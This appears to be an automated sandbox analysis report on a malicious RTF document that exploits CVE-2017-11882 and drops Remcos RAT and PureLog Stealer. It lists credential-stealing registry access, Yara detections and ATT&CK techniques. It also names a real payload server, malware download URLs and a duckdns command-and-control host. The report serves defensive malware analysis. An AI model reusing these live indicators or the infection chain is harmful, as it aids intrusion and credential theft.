                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword14_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3980, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7B1J99Jump to behavior
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 8.2.powershell.exe.439db68.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.63d0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.63d0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.439db68.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe9_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid Accounts11
                  Native API                  		111
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		13
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts43
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		2
                  Obfuscated Files or Information                  		111
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts122
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Install Root Certificate                  		2
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares2
                  Email Collection                  		1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		1
                  DLL Side-Loading                  		3
                  Credentials In Files                  		4
                  File and Directory Discovery                  		Distributed Component Object Model111
                  Input Capture                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts3
                  PowerShell                  		Network Logon Script422
                  Process Injection                  		1
                  Bypass User Account Control                  		LSA Secrets38
                  System Information Discovery                  		SSH3
                  Clipboard Data                  		213
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials3
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Modify Registry                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Virtualization/Sandbox Evasion                  		Proc Filesystem4
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
                  Process Injection                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1519296 Sample: SecuriteInfo.com.Exploit.CV... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 21 other signatures 2->61 11 WINWORD.EXE 291 13 2->11         started        process3 process4 13 EQNEDT32.EXE 12 11->13         started        18 EQNEDT32.EXE 11->18         started        dnsIp5 47 185.29.10.52, 49161, 49163, 80 DATACLUB-SE European Union 13->47 43 C:\...\makepicturewithgreatthingstobeon.vBS, Unicode 13->43 dropped 91 Office equation editor establishes network connection 13->91 93 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->93 20 wscript.exe 1 13->20         started        file6 signatures7 process8 signatures9 71 Suspicious powershell command line found 20->71 73 Wscript starts Powershell (via cmd or directly) 20->73 75 Bypasses PowerShell execution policy 20->75 77 2 other signatures 20->77 23 powershell.exe 4 20->23         started        process10 signatures11 79 Suspicious powershell command line found 23->79 81 Obfuscated command line found 23->81 83 Suspicious execution chain found 23->83 26 powershell.exe 12 5 23->26         started        process12 dnsIp13 45 ia600100.us.archive.org 207.241.227.240, 443, 49162 INTERNET-ARCHIVEUS United States 26->45 85 Installs new ROOT certificates 26->85 87 Writes to foreign memory regions 26->87 89 Injects a PE file into a foreign processes 26->89 30 RegAsm.exe 3 10 26->30         started        signatures14 process15 dnsIp16 49 authurremc.duckdns.org 30->49 51 authurremc.duckdns.org 192.210.150.29, 14645, 49164, 49165 AS-COLOCROSSINGUS United States 30->51 53 geoplugin.net 178.237.33.50, 49166, 80 ATOM86-ASATOM86NL Netherlands 30->53 95 Contains functionality to bypass UAC (CMSTPLUA) 30->95 97 Detected Remcos RAT 30->97 99 Tries to steal Mail credentials (via file registry) 30->99 103 7 other signatures 30->103 34 RegAsm.exe 1 30->34         started        37 RegAsm.exe 30->37         started        39 RegAsm.exe 30->39         started        41 6 other processes 30->41 signatures17 101 Uses dynamic DNS services 49->101 process18 signatures19 63 Tries to steal Instant Messenger accounts or passwords 34->63 65 Tries to steal Mail credentials (via file / registry access) 34->65 67 Searches for Windows Mail specific files 34->67 69 Tries to harvest and steal browser information (history, passwords, etc) 39->69

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf39%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://b.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
                  https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
                  https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%Avira URL Cloudsafe
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%Avira URL Cloudsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%Avira URL Cloudsafe
                  http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                  http://www.imvu.comr0%Avira URL Cloudsafe
                  http://acdn.adnxs.com/ast/ast.js0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%Avira URL Cloudsafe
                  http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%Avira URL Cloudsafe
                  https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
                  http://www.nirsoft.net0%Avira URL Cloudsafe
                  http://go.micros0%Avira URL Cloudsafe
                  http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%Avira URL Cloudsafe
                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                  http://www.nirsoft.netP0%Avira URL Cloudsafe
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                  http://www.imvu.com/qK0%Avira URL Cloudsafe
                  http://cache.btrll.com/default/Pix-1x1.gif0%Avira URL Cloudsafe
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt100%Avira URL Cloudmalware
                  http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFj0%Avira URL Cloudsafe
                  https://www.google.com0%Avira URL Cloudsafe
                  http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%Avira URL Cloudsafe
                  http://o.aolcdn.com/ads/adswrappermsni.js0%Avira URL Cloudsafe
                  http://www.msn.com/?ocid=iehp0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%Avira URL Cloudsafe
                  authurremc.duckdns.org100%Avira URL Cloudmalware
                  http://static.chartbeat.com/js/chartbeat.js0%Avira URL Cloudsafe
                  http://www.msn.com/de-de/?ocid=iehp0%Avira URL Cloudsafe
                  https://ia600100.us.archive.org0%Avira URL Cloudsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%Avira URL Cloudsafe
                  http://www.nirsoft.net/0%Avira URL Cloudsafe
                  https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                  http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%Avira URL Cloudsafe
                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%Avira URL Cloudsafe
                  http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%Avira URL Cloudsafe
                  http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%Avira URL Cloudsafe
                  https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%Avira URL Cloudsafe
                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%Avira URL Cloudsafe
                  https://www.ccleaner.com/go/app_cc_pro_trialkey0%Avira URL Cloudsafe
                  http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                  http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFAs40%Avira URL Cloudsafe
                  http://www.imvu.com0%Avira URL Cloudsafe
                  https://contextual.media.net/8/nrrV73987.js0%Avira URL Cloudsafe
                  http://185.29.10.520%Avira URL Cloudsafe
                  http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js0%Avira URL Cloudsafe
                  http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFsC:0%Avira URL Cloudsafe
                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%20%Avira URL Cloudsafe
                  https://contextual.media.net/0%Avira URL Cloudsafe
                  http://www.msn.com/0%Avira URL Cloudsafe
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVUF;HqRbase64Content0%Avira URL Cloudsafe
                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                  http://www.imvu.com/GK0%Avira URL Cloudsafe
                  http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIF0%Avira URL Cloudsafe
                  https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                  https://secure.comodo.com/CPS00%Avira URL Cloudsafe
                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset0%Avira URL Cloudsafe
                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=5916504975490%Avira URL Cloudsafe
                  http://cdn.at.atwola.com/_media/uac/msn.html0%Avira URL Cloudsafe
                  https://policies.yahoo.com/w3c/p3p.xml0%Avira URL Cloudsafe
                  http://www.ebuddy.com0%Avira URL Cloudsafe
                  http://www.msn.com/advertisement.ad.js0%Avira URL Cloudsafe
                  http://185.29.10.52/550/RGBV.txt0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ia600100.us.archive.org
                  		207.241.227.240
                  		truefalse
                    		unknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		unknown
                      authurremc.duckdns.org
                      		192.210.150.29
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalse
                        • Avira URL Cloud: malware
                        		unknown
                        authurremc.duckdns.orgtrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        		unknown
                        http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.29.10.52/550/RGBV.txttrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://b.scorecardresearch.com/beacon.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://acdn.adnxs.com/ast/ast.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comrRegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net03powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000014.00000002.652320409.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.nirsoft.netRegAsm.exe, 00000014.00000002.646323313.00000000002B4000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://deff.nelreports.net/api/report?cat=msnbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.nirsoft.netPRegAsm.exe, 0000000D.00000002.396938042.00000000003F3000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://go.microspowershell.exe, 00000008.00000002.382702035.0000000002DF5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.com/qKRegAsm.exe, 00000017.00000002.645240047.000000000032C000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cache.btrll.com/default/Pix-1x1.gifbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFjEQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://o.aolcdn.com/ads/adswrappermsni.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/?ocid=iehpbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://static.chartbeat.com/js/chartbeat.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/de-de/?ocid=iehpbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ia600100.us.archive.orgpowershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://login.yahoo.com/config/loginRegAsm.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.nirsoft.net/RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net0Dpowershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
